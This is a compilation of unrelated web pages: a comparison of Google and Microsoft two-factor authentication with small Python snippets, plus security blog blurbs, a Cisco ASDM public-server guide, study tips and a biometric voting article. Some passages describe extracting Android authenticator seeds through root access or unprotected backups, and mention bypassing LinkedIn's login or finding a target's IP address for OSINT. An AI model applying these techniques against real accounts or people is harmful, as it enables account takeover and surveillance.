The time-based one-time password algorithm is an open solution supported by pretty much the entire industry. Even Apple Two-Factor Authentication generates TOTP passwords when the user requests a verification code from device settings.
In TOTP, trusted devices are initialized with a shared secret. For convenience, the secret can be conveyed as a QR code. Once scanned, the QR code delivers the initialization seed to the authenticator app of choice.
This stuff is pretty much standard. Google has its own Authenticator app available for Android and iOS, but one can use pretty much any authenticator app on any major platform. For example, Microsoft offers its own TOTP-based Authenticator app for Android, iOS and Windows 10 (both desktop and mobile). Dozens of alternative apps exist.
Yes, you can use Microsoft Authenticator on Windows 10 Mobile to generate verification codes for Google Account, and vice versa: using Google Authenticator on Android successfully generates codes to Microsoft Account.
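That interoperability exists because every implementation computes the same function of the shared seed and the current time. The following is an illustrative Python sketch of the RFC 6238 algorithm (the `digits` parameter is included because, as discussed later, some services also use 8-digit codes); real authenticator apps keep the seed in protected storage rather than in code:

```python
import hashlib
import hmac
import struct
import time

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HMAC-based one-time password."""
    msg = struct.pack(">Q", counter)                      # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                            # dynamic truncation
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

def totp(secret: bytes, for_time=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: the counter is the number of 30-second steps since the epoch."""
    t = time.time() if for_time is None else for_time
    return hotp(secret, int(t // step), digits)

# RFC 6238 reference seed; a real seed arrives via the QR code.
print(totp(b"12345678901234567890", for_time=59))  # -> 287082
```

The printed value matches the RFC 6238 reference vector, which is a quick sanity check for any TOTP implementation.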
There are several essential things to know about Google’s implementation of TOTP:
– Only a single TOTP seed may exist at any given time, meaning that multiple authenticator apps can only be initialized with the same QR code
– Generating a new TOTP seed instantly invalidates all previously initialized authenticator apps
– There is no way to revoke trusted status from a given authenticator app without revoking all other authenticator apps initialized with that seed
Google TOTP Security
While the TOTP algorithm is an open industry standard, its implementations vary. In particular, the Android platform may introduce weaknesses allowing hackers to use vectors of attack unimaginable on other platforms.
– Seed data is not saved as part of the Android 6.0 backup mechanism
– Despite that, many OEM backup tools will back up and restore Authenticator data. Such backups are often stored unprotected, allowing hackers to extract and restore sensitive information.
o This usually works within one brand (ASUS, LG, etc.) or ROM (e.g. MIUI)
– If one has root access, extracting Authenticator app data is trivial
– If the bootloader is unlocked and a custom recovery is available, a TWRP NANDroid backup can successfully save and restore 2FA data
Google App-Specific Passwords
Google supports individual app-specific passwords for apps and services that do not support two-factor authentication. These passwords are generated on request, and can be revoked individually. There is no limit to the number of active app-specific passwords.
App-specific passwords offer limited access to user data. These passwords cannot be used to log in to Google Account via a Web browser, and they cannot be used for performing Google Takeout, initializing a new Android device or restoring a backup.
Google: SMS and Phone Call Verification
Verification codes can be delivered as text messages (SMS) or phone calls to a trusted phone number. This is similar to what others do, with one important exception: Google does not require verifying a phone number to activate two-factor authentication. This makes it possible for the user to configure their Google Account so that only secure authentication methods are used.
Trusted phone numbers can be added and removed at any time. Each phone number is individually revocable.
SIM-based authentication has the same issues as those we already discussed when talking about Apple’s take on two-factor authentication. The good thing is that Google does not force users to maintain a trusted phone number on their account.
Google Security Key
Google allows using FIDO Universal 2nd Factor (U2F) devices for two-factor authentication. Google Security Key is only supported on desktops and laptops (including Chromebooks) as well as select tablets with OTG functionality that can run Chrome 40 and newer. A USB port is obviously required.
Google Security Key only works in Chrome.
Last but not least, let us have a look at Google’s newest addition to the family of two-factor authentication methods, the Google Prompt.
Unlike Apple, Google does not have full control over Android, the base operating system. What Google does have, however, is full control over Google Play Services, an essential component installed on most Android smartphones and tablets sold in the Western hemisphere (Amazon being a notable exception).
Google Prompt works by pushing an interactive verification prompt through GCM (Google Cloud Messaging), which is available on Android devices as part of Google Play Services and on iOS devices as part of the Google app.
Google Prompt is now the default and recommended authentication method. It’s by far the fastest and most convenient of them all. Being a simple “Yes” or “No” message delivered to a trusted device, it does not require opening an app or entering codes. If the user cannot receive the prompt, they can easily select a different authentication method (e.g. a code generated in the authenticator app or delivered in a text message).
Once again, there are no verification codes sent via this prompt. Users just confirm or deny the request. Unlike Microsoft implementation, users cannot respond to Google Prompt on locked devices. Both Android and iOS devices must be unlocked in order to confirm the request (this is not always so with Microsoft prompts).
Google Prompt was introduced in 2016, well after the release of Android 7.0 Nougat. However, Google Prompt does not depend on the version of Android. We successfully tested Google Prompt authentication on Android 5.1, 6.0.1, 7.0 and 7.1 (we don’t have devices running earlier versions of Android).
If there is one thing Google could improve, it is setting up trusted devices. When trying to add a bunch of Android and iOS devices as trusted devices through Google Account, we discovered that Google assumes that the user has a single Android device and (maybe) one iPhone. We were able to add other devices at a later point, but that required quite a lot of work and even triggered some sort of a warning in our Google Account, with Google Prompt functionality being temporarily blocked until the next day. In the end, most but not all issues were ironed out.
Users can add and remove trusted devices via Google Account Settings in a Web browser, iOS Google App or in Google Settings on Android devices.
Interestingly, when users set up new devices during initial configuration, they are prompted whether they want to make it a trusted device (Android). The same prompt is received when signing in to the Google app on iOS.
Revoking trusted status can be done either online from a different device or from the device itself (via settings or by removing the Google Account from Settings – Accounts).
Quick data sheet:
– Interactive “Yes” or “No” prompt
– Implemented via Google Cloud Messaging (GCM) on Android, Google App on iOS
– NEW: Code delivery now being tested on Android Wear
– Independent of Android or iOS version
– Requires unlocking the device to see the prompt
Google Two-Factor Authentication Conclusion
Google offers a vast number of options to set up authentication. The single least secure setting (phone-based delivery) is available but is not obligatory, allowing the user to configure 2FA in the most convenient or the most secure way, with multiple stops in between. Unlike Apple, Google allows using non-Google devices for authentication. iOS receives full support (TOTP, Google Prompt), while other platforms (BlackBerry 10, Windows Phone, Windows 10 Mobile) will work via offline, TOTP-based third-party authenticator apps.
Beginning with Windows 8.1 and Windows Phone 8.1, Microsoft started unifying its mobile and desktop operating systems. No wonder the two versions of Microsoft’s latest OS, Windows 10, share the same approach to two-factor authentication.
Microsoft employs a somewhat unique approach to two-factor authentication. Even if the user does not want to use two-factor authentication and does not set up any secondary authentication methods, in some circumstances Microsoft would still prompt to confirm account login. Just like Google, the company would verify unusual sign-in activities occurring from a new device in another country. However, it’s not just that. Microsoft would also try to verify Microsoft Account activities once the user attempts to restore a new phone (Windows Phone 8.1 or Windows 10 Mobile) from OneDrive backup. Interestingly, Microsoft would do exactly the same verification if one sets up an account on a new PC (desktop, laptop or tablet) and attempts to restore from OneDrive backup.
If no two-factor authentication is configured but the user has a trusted phone number and the device being set up is a new phone, Microsoft will attempt to send a text message to that phone. Interestingly, the SMS will be automatically processed by the setup tool; no user interaction would be required when setting up that phone.
What’s so unique about this setup is the ability for the user to configure all possible two-factor authentication methods (SMS, push, TOTP etc.) without actually ENABLING two-factor authentication. For example, one can set up offline authentication with an authenticator app (made by Google, Microsoft, or one of the many third parties) as well as prompt-based authentication with Microsoft Authenticator (available for Android, iOS and both versions of Windows 10). The second authentication factor will NOT normally be prompted. However, if Microsoft detects unusual sign-in activity, or if the user attempts performing a highly sensitive operation (restoring from a cloud backup, syncing passwords), the system will then request additional verification with any method.
If the user decides to enable the full protection provided by two-factor authentication, nothing will really change except that secondary verification will take place at every attempt to sign in to a Microsoft Account.
In a way, this all means that two-factor authentication for Microsoft Accounts is always there. Whether the user has the switch “enabled” or “disabled” only affects the scope of protection: “enabled” two-factor authentication protects all sign-in requests, while if the additional protection is “disabled” it only protects against suspicious sign-in activities and highly sensitive operations such as restoring data from a cloud backup and syncing Internet Explorer/Edge passwords with a new device.
Enrolling in two-factor authentication can only be performed online from the user’s Microsoft Account: https://account.live.com/proofs/Manage
The user does not have to have any Microsoft or Windows device in order to use two-factor authentication. It’s the same with Google, but Apple would only enable two-factor authentication if the user owns at least one iOS or macOS device. On the other hand, Apple’s two-step verification could be also enabled via the browser.
Microsoft Account: Delivery Options
Microsoft offers plenty of delivery options for secondary authentication. This includes:
• A code sent to a backup email address (Microsoft and non-Microsoft email addresses supported)
• Text message sent to a trusted phone number
• Identity verification app: interactive prompt (similar to Google Prompt) delivered to Microsoft Authenticator apps on Windows, Android and iOS
o Previously, Microsoft Account app was used on Android for the same purpose
o Microsoft Authenticator app integrates interactive authentication functionality for Microsoft Accounts with TOTP for third-party accounts
• App-specific passwords
o An email is sent every time the user attempts to sign in from an app or device not supporting two-factor authentication, suggesting the use of an app-specific password
o If Microsoft knows such apps or devices are used, an app-specific password will be generated and displayed automatically as the user sets up two-factor authentication for the first time
• Alerts are delivered to trusted emails and phone numbers
• Printable recovery code (for reinstating account access)
Microsoft Account: SIM-Based Authentication
We discussed SIM-based authentication already. Notably, Microsoft does not require the user to configure a trusted phone number. If, however, a trusted phone number is configured, Microsoft will attempt to automatically perform the secondary authentication step when setting up a new Windows 10 Mobile device and restoring it from the OneDrive backup. The company will send a text message to that phone, and the Setup wizard will automatically receive that message and verify sign-in.
Microsoft Account: TOTP
Microsoft supports the time-based one-time password algorithm to generate 6-digit verification codes. Users can add trusted devices by scanning a QR code. Just like Google, Microsoft allows using the same seed on multiple devices, which also means that TOTP-based authenticator apps are not individually revocable. Revoking an authentication app instantly invalidates codes generated by all other authentication apps initialized with that seed.
While Microsoft makes use of the industry-standard implementation that generates a new 6-digit password every 30 seconds, the company’s proprietary Microsoft Authenticator offers a somewhat different experience. Adding a Microsoft Account by signing in (with email and password) as opposed to scanning a QR code results in a new entry that generates 8-digit passwords every 30 seconds. Interestingly, in this scenario a unique seed is used for every Microsoft Authenticator installation; as such, those are individually revocable.
Microsoft Authenticator is available for Android, iOS and Windows 10 platforms, and provides push-based authentication in addition to 6-digit and 8-digit TOTP codes. Interestingly, one can freely choose between using 6-digit and 8-digit TOTP codes at any time to verify Microsoft Account sign-ins.
Microsoft Identity Verification App: Push and TOTP
Microsoft implements push-based authentication prompt via its proprietary Microsoft Authenticator app. Historically, Microsoft offered this authentication experience exclusively on the Android platform via the Microsoft Account app. Ironically, this very functionality was not available on Microsoft’s own mobile operating system, Windows Phone 8.1 and later Windows 10 Mobile.
It was only recently that Microsoft has released a proper Microsoft Authenticator app with an interactive authentication prompt. In this case, it’s a simple “Yes” or “No” prompt with no additional code displayed or required. Each prompt has its own unique identifier allowing the user to see if the request comes from the login session they are trying to authenticate. This type of authentication is server-based. Confirming the request automatically verifies sign-in session.
Interestingly, Microsoft Authenticator operates differently across platforms. Android and iOS devices must be unlocked in order for the user to access the prompt. Windows 10 Mobile devices will display the authentication prompt and allow the user to confirm the request even if the phone is locked. This is one major security issue with Microsoft’s implementation on Windows 10 Mobile smartphones.
Microsoft: App-Specific Passwords
Microsoft offers app-specific passwords. The implementation is similar to Apple’s and Google’s. App-specific passwords consist of 16 lowercase letters, and are individually revocable.
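Generating a password in that format is straightforward; the sketch below is illustrative only (the server-side storage and per-app revocation logic, which do the real work, are omitted):

```python
import secrets
import string

def app_specific_password(length: int = 16) -> str:
    # 16 lowercase letters gives 26**16 (about 4e22) combinations,
    # far too many to brute-force through an online interface.
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(length))

print(app_specific_password())
```

Note the use of `secrets` rather than `random`: app-specific passwords are long-lived credentials, so they must come from a cryptographically secure generator.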
Microsoft sends an email to the user’s registered email address every time it detects an attempt to use Microsoft Account-related services with an app not supporting two-factor authentication. This, for example, includes BlackBerry 10 Hub (the built-in email app) as well as Microsoft Outlook from older versions of Microsoft Office that use IMAP to access Microsoft email accounts. If the user attempts to sign in from an app or device not supporting two-factor authentication, the company will deliver an email with instructions on how to generate an app-specific password for that app.
Interestingly, Microsoft seems really serious about app-specific passwords; much more so than Google or Apple. If Microsoft knows that the user has active apps or devices accessing Microsoft services and not supporting two-factor authentication, an app-specific password will be generated and displayed automatically as the user sets up two-factor authentication for the first time.
We reviewed two-factor authentication options available on all three major mobile platforms. Apple prefers keeping things inside their closed ecosystem which, in theory, could offer the best security. This is spoiled by one notable exception: Apple requires users to verify at least one trusted phone number, which opens a way for attackers to defeat two-factor authentication by cloning or replacing the victim’s SIM card. Google offers a wide array of authentication options. The insecure SMS/phone call verification is also there, but at least it’s not obligatory. Microsoft offers some very interesting authentication options; insecure delivery methods include trusted email addresses (Microsoft or non-Microsoft) and SMS/phone calls. In addition, Microsoft’s implementation of cloud-based push is flawed on the company’s very own mobile platform: Windows 10 Mobile devices allow confirming such prompts even if their display is locked. We have no clear winner, as each company offers a choice of authentication options catering to its very own audience.
Quantum Breakthrough Uses Lasers to Find Data in a Giant Cloud of Atomic Nuclei with Particle Encoded with Quantum Information
(ZDNet) Researchers from the University of Cambridge’s Cavendish Laboratory designed a method to better control the behavior of a cloud of atomic nuclei into which they had injected a single particle encoded with quantum information, also called a quantum bit. This comes with a noise problem: with every nucleus spinning in a different direction within the cloud, it is near-impossible to identify the particle carrying the information.
Using laser beams and a single electron, however, the physicists were able to control the spins of the nuclei, restore some order in the cloud, and as a result, detect the existence of the quantum information much more easily.
With this new technique, the scientists were able to detect the existence of quantum information as a “flipped quantum bit”, with levels of precision that were high enough to see a single qubit flip in the cloud of nuclei. Now that they have harnessed the potential to control the cloud of nuclei, the researchers said that the next step will be to demonstrate the actual storage and retrieval of a qubit from a quantum dot.
The quantum technology field is concerned with developing ways to send and receive quantum information in the form of qubits. The idea is at the heart of the quantum internet, a project pursued by many countries around the world, which seeks to create a network that will let quantum devices exchange quantum information.
It is one thing to use a quantum dot to store quantum information, but it is another to then find and retrieve the data – and this is where the noisy, messy spin of the atomic nuclei is problematic.
“The solution (…) is to store the fragile quantum information by hiding it in the cloud of 100,000 atomic nuclei that each quantum dot contains, like a needle in a haystack,” said Mete Atatüre, professor at Cambridge’s Cavendish Laboratory, who led the research. “But if we try to communicate with these nuclei like we communicate with bits, they tend to ‘flip’ randomly, creating a noisy system.” | <urn:uuid:bba81103-df2c-46aa-b461-541642296e94> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-breakthrough-uses-lasers-to-find-data-in-a-giant-cloud-of-atomic-nuclei-with-particle-encoded-with-quantum-information/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00365.warc.gz | en | 0.931904 | 455 | 3.28125 | 3 |
Organizations acquire and store massive amounts of data. Numerous critical business procedures within the organization depend on the accuracy and comprehensiveness of this stored data. There are several ways in which the data’s accuracy can be harmed. If this data is altered or deleted by a third party without authorization, the consequences for the business could be severe, especially if the compromised information was of a sensitive nature. Thus, it is crucial for a company to protect the accuracy of the data it stores by implementing the necessary security measures. This article covers in-depth information about data integrity along with details on its significance, various types, and several techniques that can be used for the preservation and verification of data integrity.
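One of the simplest verification techniques in this area is a cryptographic checksum: record a hash of the data at rest and recompute it later, since any unauthorized change to the underlying bytes changes the hash. A minimal sketch (the record contents are made up for illustration):

```python
import hashlib

def fingerprint(data: bytes) -> str:
    """SHA-256 digest of the data, stored separately from the data itself."""
    return hashlib.sha256(data).hexdigest()

record = b"Q3 revenue: 1,204,000"
baseline = fingerprint(record)           # captured when the data is known-good

tampered = b"Q3 revenue: 9,204,000"      # a single altered byte
print(fingerprint(record) == baseline)   # True  -> integrity intact
print(fingerprint(tampered) == baseline) # False -> modification detected
```

A hash alone detects accidental or casual tampering; detecting an attacker who can also rewrite the stored hash requires an HMAC or digital signature keyed with a secret.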
Artificial intelligence is increasingly being used in almost every sector of business and industry globally. The adoption of artificial intelligence in the cybersecurity sector has also been influenced by this rise. The cybersecurity landscape has seen a tremendous shift as a result of AI. In today’s business contexts, there is a significant and quickly expanding surface for cyberattacks. This indicates that more than just human interaction is required for cybersecurity posture analysis and improvement within a company. Since these technologies can quickly analyze millions of data sets and find a wide range of cyber threats, Artificial Intelligence and Machine Learning are now becoming crucial to information security. Nowadays, AI is being included into a wide range of products and applications that are employed in effective threat identification and cyberattack prevention. This article discusses the foundational ideas of artificial intelligence, its function and applications in the field of cybersecurity, and how AI can be applied to enhance an organization’s overall security posture.
Over recent years, data has become one of the most critical assets for the organization. This data can include financial spreadsheets, blueprints on new products, an organization’s trade secrets, private customer information and so much more. Any security incident that can damage or destroy this data can have severe repercussions for the organization and in some cases can cause the organization to become bankrupt. An organization with strong business continuity and disaster recovery planning takes into account all the scenarios that can adversely affect its critical assets. Data backup and recovery mechanisms in an organization, therefore, play a crucial role in the organization’s recovery procedures. This article goes over the importance of data backup and recovery, its types, and the different storage options available to the organization for storing this backup data.
A web application user interacts with it in a variety of ways and can perform different actions depending upon his access restrictions. Most of the time these web applications require users to log in in order to perform actions that only authenticated and authorized users are allowed to perform. HTTP is a stateless protocol that doesn’t maintain user state while a user performs different actions within the web application. This meant that application developers had to come up with a different way to maintain the state of the user’s connection with the web application. The use of session IDs and cookies is one such way to maintain this state. However, malicious adversaries can employ different tactics to hijack the session of a legitimate user. These types of attacks are called session hijacking attacks. This article goes over the basics of user sessions and session hijacking, the types of session hijacking attacks, and the different techniques that can be used to prevent these attacks.
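One standard preventive technique is hardening the session cookie itself so it is harder to steal or replay. A sketch using Python’s standard library (the cookie value shown is a placeholder; `SameSite` support assumes Python 3.8+):

```python
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["sessionid"] = "k7pq..."             # opaque value, generated server-side
cookie["sessionid"]["httponly"] = True      # hidden from JavaScript (blunts XSS theft)
cookie["sessionid"]["secure"] = True        # sent over HTTPS only (blunts sniffing)
cookie["sessionid"]["samesite"] = "Strict"  # not sent on cross-site requests

header = cookie.output()
print(header)
```

These flags reduce the ways a session ID can leak; servers should additionally rotate the ID after login and expire idle sessions.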
Sysmon is a component of the Microsoft Sysinternals Suite that runs as a kernel driver and may monitor and report on system events. Businesses frequently utilize it as part of their tracking and logging systems.
As discussed in a previous article, while doing social media OSINT, LinkedIn is one of the places you want to research. Let’s say that you have a first and last name but no LinkedIn account. Unfortunately, you can’t look up people on LinkedIn without an account. Is there a way to do OSINT research on LinkedIn without creating a covert account? In this blog page, we will learn how to bypass LinkedIn’s credentialing requirements with Google’s mobile-friendly test.
LinkedIn is the most widely used business-related social networking site in the modern world. Before viewing any data, users must first register a free profile on the site. To search for a name, just type the target’s name into the search box and press the enter key. The target’s employer, location, profession, and photo should then appear on the search result. After locating the correct target, clicking the name will take you to that user’s profile. In this article, we’ll look at how to improve our Linkedin people search and how to fine-tune our covert OSINT account settings.
The General Data Protection Regulation (GDPR) came into effect on 25 May 2018. The new set of privacy laws protects the personal data of EU citizens and requires companies to disclose how they handle user information. These new regulations apply to any company that handles the personal data of EU residents, no matter where the company is based. Non-compliance with GDPR can result in hefty fines. The cyber security landscape has changed rapidly over the past few years with an increasing number of cyber attacks and breaches reported almost every day. Companies are also increasingly aware of their responsibilities for protecting customer data as well as other personally identifiable information (PII). This article goes over the importance of this law, how organizations around the world are affected by the law, the rights of data subjects under this law, and how organizations can ensure data protection under this law.
You can use IP addresses to track people across several websites online. You may have IP addresses gathered via online research, an email message, or an internet connection. Using OSINT, we will explore various methods for obtaining a target’s IP address. We have already covered how to do a simple whois query in a previous blog article. This domain name lookup will provide IP addresses linked with the websites you’re investigating.
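The simplest of these lookups, turning a domain name into an IP address, needs nothing beyond the standard library:

```python
import socket

def resolve(hostname: str) -> str:
    """Forward DNS lookup: returns one IPv4 address for the host."""
    return socket.gethostbyname(hostname)

print(resolve("localhost"))  # e.g. 127.0.0.1
```

The resolved address can then be fed into a whois query to identify the hosting provider or netblock owner.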
Windows logs include a plethora of structured data from many log sources. Event logs capture events that occur during system execution to analyze system activity and troubleshoot faults. This blog article will teach you about common logs and how to examine crucial events in your system. | <urn:uuid:d987eb99-16ea-4193-953b-0787903cd525> | CC-MAIN-2022-40 | https://blog.mosse-institute.com/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00365.warc.gz | en | 0.935221 | 1,261 | 3.203125 | 3 |
Most people are now involved in one or more of the social networking sites available online, such as Facebook, LinkedIn, MySpace, and Twitter.
The focus behind social networking is building an online community that shares some common interest. These sites are mostly web-based and provide a variety of ways to interact, such as through your web browser, instant messaging, and email. Access isn’t necessarily through your computer; a lot of it is now through mobile devices such as iPhones and BlackBerrys.
Social networking is excellent at reviving old contacts, helping advertise you and your business, and maintaining contacts. It can also be seen as time theft. I would go so far as to say many people even have an addiction that needs to be addressed. There are also risks that need to be considered, such as data leakage, identity theft, and virus infections.
Policies should be added regarding your corporation’s position on social networks, as employees may assume that use is authorized without a corporate policy governing acceptable use of these technologies. There are also ways to block access to certain sites through your Internet connection.
One should be careful to ensure these technologies are appropriate for your organization and that the risks do not outweigh the benefits. | <urn:uuid:ff35a0f7-5b34-4d80-a140-f3a54a9a2438> | CC-MAIN-2022-40 | https://davidpapp.com/2009/04/14/social-networking-in-the-corporate-environment/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00365.warc.gz | en | 0.973972 | 247 | 2.546875 | 3 |
This is the second post in my ongoing series on the troubles posed by high-speed signals in the hardware security lab.
What is a High-speed Signal?
Let’s start by defining “high-speed” a bit more formally:
A signal traveling through a conductor is high-speed if transmission line effects are non-negligible.
That’s nice, but what is a transmission line? In simple terms:
A transmission line is a wire of sufficient length that there is nontrivial delay between signal changes from one end of the cable to the other.
You may also see this referred to as the wire being “electrically long.” | <urn:uuid:184f0768-faa8-482c-be4b-1c022f13ec73> | CC-MAIN-2022-40 | https://ioactive.com/probing-and-signal-integrity-fundamentals-for-the-hardware-hacker-part-2/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00365.warc.gz | en | 0.947049 | 144 | 3.09375 | 3 |
When you are studying networking in particular you have to deal with a LOT of information. Most people find it difficult to keep track of notes and remember everything when they are studying for an exam. One of the techniques I show to Cisco CCNA students is to use mindmapping. A mindmap is pretty much the same as taking notes but the big difference is that everything is structured. It’s like putting your brain on paper.
A mindmap is a diagram which consists of text, images or relationships between different items. Everything is ordered in a tree-like structure. In the middle of the mindmap you write down your subject. All the topics that have to do with your subject can be written down as branches of your main subject. Each branch can have multiple sub-branches, where the pieces of information are leaves. Mindmaps are great because they show the relationships between different items, whereas notes are just lists.
You can create mindmaps by drawing them yourself or by using your computer. I prefer the second method because I can save and print them, but also because I’m faster at typing than writing.
If you want to give it a try take a look at Xmind. It’s free and it’s the mindmapping tool that I like best.
You can download Xmind for free from the Xmind website.
Once you have installed it and started a new project you can add some items.
You don’t have to use the mouse to add new items, just use ENTER to add a new branch or press INSERT to add a new sub-branch.
Here’s an example I created for CCNA with some of the items, just to give you an impression:
The example above is anything but complete, but it should give you an idea. Give mindmapping a try to see if you like it!
This document describes how to configure a public server using Cisco Adaptive Security Device Manager (ASDM). Public servers are application servers whose resources are accessed by the outside world. A feature called Public Server was introduced in Cisco ASDM software release 6.2.
There are no specific requirements for this document.
The information in this document is based on these software and hardware versions:
The information in this document was created from the devices in a specific lab environment. All of the devices used in this document started with a cleared (default) configuration. If your network is live, make sure that you understand the potential impact of any command.
Refer to the Cisco Technical Tips Conventions for more information on document conventions.
A web server with internal IP address 172.16.10.10 is in the DMZ network and should be accessible from the outside world. You need these items in order to accomplish this:
From Cisco ASDM software release 6.2 and later, a new Public Server wizard is available. You no longer need to configure the NAT translations and the ACL permits separately. Instead, you specify a few simple details: public interface, private interface, public IP address, private IP address, and service.
In this section, you are presented with the information to configure the features described in this document.
Note: Use the Command Lookup Tool (registered customers only) to obtain more information on the commands used in this section.
This document uses this network setup:
Complete these steps in order to configure a public server with the wizard.
Choose Configuration > Firewall > Public servers.
Click Add. Then the Add Public Server window appears.
Now specify these parameters:
Private Interface—The interface to which the real server is connected.
Private IP Address—The real IP address of the server.
Private Service—The actual service that is running on the real server.
Public Interface—The interface through which outside users can access the real server.
Public Address—The IP address that is seen by outside users.
You can view the related configuration entry in the Public Servers pane.
The equivalent CLI configuration is shown here for your reference:
| Cisco ASA
access-list outside_access_in extended permit tcp any host 203.0.113.10 eq www
access-group outside_access_in in interface outside
static (dmz,outside) 203.0.113.10 172.16.10.10 netmask 255.255.255.255
When you use Cisco ASDM version 6.2, you can configure the public server with static NAT only, not with static PAT. This means the public server is reachable from the outside world on the same service port that actually runs on the server. From Cisco ASDM software release 6.3 and later, support for static NAT with Port Address Translation is available, which means you can expose the public server on a different port from the one the service actually uses.
This is a sample ASDM screen shot of the Add Public Server window for ASDM software release 6.3.
In this case, the public service can be different from the private service. Refer to Static NAT with Port Address Translation for more information.
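For reference, an equivalent static PAT entry on the ASA CLI (pre-8.3 syntax) might look like the following sketch, using hypothetical addresses and ports — here outside users connect to port 80 (www) while the server actually listens on 8080:

```
static (dmz,outside) tcp 203.0.113.10 www 172.16.10.10 8080 netmask 255.255.255.255
access-list outside_access_in extended permit tcp any host 203.0.113.10 eq www
access-group outside_access_in in interface outside
```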
This feature is introduced exclusively from the ASDM perspective to make it easier for administrators to configure public servers. No equivalent new CLI commands are introduced. When you configure a public server using ASDM, the equivalent static and access-list commands are created automatically and can be viewed in the corresponding ASDM panes. A modification to these entries also results in a modification of the public server entry.
There is currently no verification procedure available for this configuration. | <urn:uuid:51e646ec-229a-4743-be8f-0cb0396c9d2d> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/113425-asdm-pub-server-00.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00365.warc.gz | en | 0.878299 | 802 | 2.515625 | 3 |
Over the last years, we have seen revolutionary changes in biometrics. Biometric technology has been implemented in every sector one can imagine, and it is being used to automate the existing processes. One of the major fields where biometric technology has created a huge impact is the government sector. This article will discuss the advantages of using a biometric voting system.
What Is a Biometric Voting System?
Many nations are still having difficulty enrolling and verifying voters. As a result, they’re evaluating the negative impact on their democratic systems. Indeed, during the last ten years, biometric registration and voting technologies have grown in popularity. The goal is to achieve voter equality, founded on the idea of one person, one vote, which states that everyone’s vote should be counted fairly.
In a biometric voting system, voters are registered based on unique physical characteristics such as fingerprints, facial features, or iris patterns. Using these biometric characteristics, a person is registered as a voter. Biometric technology targets identity theft, vote tampering, and other forms of voter fraud. The biometric voting system aims to produce a unique list of voters with zero duplicates.
An election is deemed fair under constitutional provisions if it respects the standards of liberty and equality and the confidentiality of voting. This entails, in particular, a duty on the part of the electoral bodies to ensure the fairness of the voting process. All aspects of the election should be considered, from voter registration to the outcome of the vote and the electoral activities themselves. The use of biometric technology in electoral processes helps overcome the obstacles to executing the “one citizen, one vote” concept required for democratic, free, and transparent elections.
How the Biometric Voting System Works
It is crucial to have a biometric voting system because it promotes fair registration and eventually a better outcome. There are a limited number of ready-to-use Biometric voting systems out there, and TrueVoter™ is a biometric voter registration system for fair and credible elections. Here is how TrueVoter™ works:
The first stage is the enrollment process, where voters’ biometric information is recorded using a biometric device. Depending on the need, it can use a single modality or multiple modalities like a fingerprint, facial, or Iris. The data is managed under a central application.
An advanced search algorithm performs 1:N matching to eliminate any duplicate entries. The deduplication process used by TrueVoter™ is among the fastest and most advanced systems in the world for providing an accurate and fast result.
The final stage is the authentication or adjudication, where a final voter list is provided showing zero duplicate data. This is the most important step toward ensuring a fair and corruption-free election.
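TrueVoter™'s matching algorithm is proprietary, but the general idea of a 1:N duplicate check can be sketched in a few lines. This toy Python example compares simple feature vectors with cosine similarity; real systems use specialized fingerprint/iris matchers, and the 0.99 threshold here is purely illustrative:

```python
def similarity(a, b):
    """Cosine similarity between two toy biometric feature vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = (sum(x * x for x in a) ** 0.5) * (sum(y * y for y in b) ** 0.5)
    return dot / norm if norm else 0.0

def find_duplicates(templates, threshold=0.99):
    """Naive 1:N check: compare every pair of enrolled templates and flag
    near-identical ones as suspected duplicates."""
    dups = []
    for i in range(len(templates)):
        for j in range(i + 1, len(templates)):
            if similarity(templates[i], templates[j]) >= threshold:
                dups.append((i, j))
    return dups
```

Any pair flagged this way would go to the adjudication stage for a human decision rather than being removed automatically.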
Advantages of the Biometric Voting System
You may understand why a country needs a biometric voting system, but apart from eliminating duplicate data, a few more advantages come with the biometric voting system.
The actual democratic process is transparent from start to end with a biometric voting process. Moreover, the framework’s design allows an authority to verify that votes accurately reflect a voter’s aim when casting a ballot.
Many voters bail out of the voting process due to worries about identity theft, as votes could be cast using fake identities. Since voters are registered with unique biological traits, it is impossible to tamper with them. As voters know that only they can cast their own vote, participation will increase.
Compared to the old approach to voter registration, the biometric voting system is easily scalable. With the old method, adding new voters to the system becomes troublesome as the population grows. With a biometric voting system, on the other hand, adding new voters is easy, and there is no chance of duplication.
The biometric system allows the right voters to cast votes and eliminate any chance of scams. This allows a fair result and a fair election.
Suppose you are using TrueVoter™ for biometric voter registration. Doing so will ensure strong encryption, fault-tolerant design, disk mirroring, automatic database backups, and disaster recovery options. These are some of the precautions used to preserve citizen privacy.
Sovereign states are increasingly resorting to biometric voting technologies to enable fair, credible elections free of fraud and unlawful behaviors to safeguard democratic ideals. Election integrity is a cornerstone of contemporary democracy since it encourages trust and honesty in elected governments and confidence and faith in elected officials. | <urn:uuid:84c0e525-9f4b-4b39-8610-60c24a3172ed> | CC-MAIN-2022-40 | https://www.m2sys.com/blog/biometric-software/advantages-of-a-biometric-voting-system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00365.warc.gz | en | 0.916313 | 965 | 2.953125 | 3 |
Rapid changes in the cybersecurity landscape have led to rising pressure on agencies to improve their protection of federal data. Government contractors are especially vulnerable to cyberattacks as hackers target these firms to create widespread disruption across the United States.
